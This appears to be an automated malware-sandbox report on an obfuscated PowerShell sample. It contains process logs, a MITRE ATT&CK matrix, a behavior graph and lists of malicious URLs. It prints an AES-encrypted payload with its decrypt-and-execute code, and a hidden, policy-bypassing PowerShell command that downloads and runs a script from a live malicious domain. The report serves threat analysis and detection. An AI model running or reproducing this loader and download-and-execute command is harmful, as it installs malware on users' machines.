5b29cb64430183af5618b121490dee43084dc3253bc82e49716867cb584156d7865e1fa9da392090109df6e9a6cefcab60be063896fe271d5f7145798747455ebe31b24e9bae3dde94e125c3aab0f1cc7da5d7d2c49f75d3d71be3450edfb23086a4d618521b1ee6ea4f7759e9cfc131005524c9b65d1d3d9fcb4f3e8a222d8020e0829864f6709cea97810c2185cb147f13c7495b150a44fe94ec3e805fbe21bab82b15870cae560aae4d4d533e433abf4e5a563b39f36b23b63195f3779b0f8e07ae51936d7659cf47354c6662908568295088267d164dbf8cd609767b8170defee21b10ce5c7244c519247c7c2f9ce8d7fa4027320e443b37f498f4bcde2e63a97ac0167dcbd9df73193fa93b3a82859fc1c7c6a740dd7140682426d7269e3ddeb5ab9467ec828c2c24e5d9149a12d98dff32d05203d7536888907c29ca12dfcfb29b179e5f80df3c545318d33794fae90bec7c573d81530a72c3e1664c1fcd78ffe0cc509a78f2e435bee0a9ee5e4c0f5f6825b6883a784655b387ac0a63d3779d94d06e0c3bfc63d493d83b351266304e3c6a7fe938db9f5ffd576369c82ca0050c55c2e8e82286d9ac048ee0f6e20cf515b8d1a1268959b2d3e695204352487cf3533397b42917060a182262aa9f2ea0b93e6742c4a2c669e95cd728');$midmd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((qtyvd('794a5742476f737a6a656e545246734b')),[byte[]]::new(16)).transformfinalblock($zkihj,0,$zkihj.length)); & $midmd.substring(0,3) $midmd.substring(129)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command & {'2lt'|foreach-object {si variable:2lt ([powershell]::create()); [void](get-item variable:\2lt).value.addscript((([system.net.webclient]::new().((([system.net.webclient]::new()|get-member)|where-object{(get-variable _ -value).name -ilike '*wn*d*g'}).name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (get-item variable:\2lt).value.invoke(); (get-item variable:\2lt).value.dispose()}} Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580443 Sample: #U65b0#U5efa #U6587#U672c#U... Startdate: 24/12/2024 Architecture: WINDOWS Score: 80 33 pawpaws1.readit-carfanatics.com 2->33 35 pawpaws.readit-carfanatics.com 2->35 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 Sigma detected: Suspicious MSHTA Child Process 2->45 47 3 other signatures 2->47 10 powershell.exe 11 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 51 Suspicious powershell command line found 10->51 53 Bypasses PowerShell execution policy 10->53 16 mshta.exe 17 10->16         started        20 conhost.exe 10->20         started        37 127.0.0.1 unknown unknown 13->37 signatures6 process7 dnsIp8 31 pawpaws1.readit-carfanatics.com 172.67.201.143, 443, 49730, 49734 CLOUDFLARENETUS United States 16->31 39 Suspicious powershell command line found 16->39 22 powershell.exe 18 16->22         started        signatures9 process10 signatures11 49 Suspicious powershell command line found 22->49 25 powershell.exe 15 17 22->25         started        27 conhost.exe 22->27         started        process12 process13 29 conhost.exe 25->29         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U65b0#U5efa #U6587#U672c#U6587#U6863.ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://pawpaws.readit-carfanatics.com/madonna.mp4/E100%Avira URL Cloudmalware
https://pawpaws1.readit-carfanatics.com/madonna.vstx100%Avira URL Cloudmalware
https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp40%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4TTC:0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4S0%Avira URL Cloudsafe
http://pawpaws1.readit-carfanatics.com100%Avira URL Cloudmalware
https://pawpaws.readit-carfanatics.com/madonna.mp4O0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4i0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4T0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp410%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4rC:0%Avira URL Cloudsafe
https://pawpaws1.readit-carfanatic0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp460%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4E0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4:0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4C:0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4H0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/eE0%Avira URL Cloudsafe
https://pawpaws1.readit-carfanatics.com100%Avira URL Cloudmalware
https://pawpaws.readit-carfanatics.com/madonna.mp4...F0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMh0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4oG0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4(0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4-0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4x0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4w0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4100%Avira URL Cloudmalware
https://pawpaws.X0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4ic0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=I0%Avira URL Cloudsafe
https://pawpaws.readit-carfanatics.com/madonna.mp4...100%Avira URL Cloudmalware
https://pawpaws.readit-carfanatics.com/madonna.mp4fE0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pawpaws.readit-carfanatics.com
172.67.201.143
truetrue
    		unknown
    pawpaws1.readit-carfanatics.com
    		172.67.201.143
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://pawpaws1.readit-carfanatics.com/madonna.vstxtrue
      • Avira URL Cloud: malware
      		unknown
      https://pawpaws.readit-carfanatics.com/madonna.mp4true
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://pawpaws.readit-carfanatics.com/madonna.mp4Omshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://pawpaws.readit-carfanatics.com/madonna.mp4Smshta.exe, 00000002.00000002.1807186379.000001C9A4130000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://pawpaws.readit-carfanatics.com/madonna.mp4Tmshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://pawpaws.readit-carfanatics.com/mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
          		high
          https://aka.ms/pscore6powershell.exe, 00000000.00000002.1684443354.000001CD04A5E000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://pawpaws.readit-carfanatics.com/madonna.mp4/Emshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://pawpaws.readit-carfanatics.com/madonna.mp4imshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pawpaws1.readit-carfanatics.compowershell.exe, 00000006.00000002.1790101993.00000000098FC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
              		high
              https://pawpaws.readit-carfanatics.com/madonna.mp4TTC:mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://pawpaws.readit-carfanatics.com/madonna.mp41mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
                		high
                https://pawpaws.readit-carfanatics.com/madonna.mp4rC:mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://pawpaws.readit-carfanatics.com/madonna.mp46mshta.exe, 00000002.00000003.1779641762.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1782599751.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793135818.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1806411558.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783270231.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1784469451.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://pawpaws.readit-carfanatics.com/madonna.mp4:mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.0000000006479000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://pawpaws1.readit-carfanaticpowershell.exe, 00000006.00000002.1790101993.00000000098F8000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://pawpaws.readit-carfanatics.com/madonna.mp4C:mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pawpaws.readit-carfanatics.com/madonna.mp4Emshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1684443354.000001CD04A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://pawpaws.readit-carfanatics.com/madonna.mp4Hmshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1804268352.000001C19E1D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                          		high
                          https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMpmshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pawpaws.readit-carfanatics.com/eEmshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://go.micropowershell.exe, 00000004.00000002.1738683834.0000018900F17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://pawpaws1.readit-carfanatics.compowershell.exe, 00000006.00000002.1790101993.00000000096F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1790101993.0000000009421000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMhmshta.exe, 00000002.00000003.1779854987.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793336898.000001C99EB18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792624686.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1805508732.000001C99EB19000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
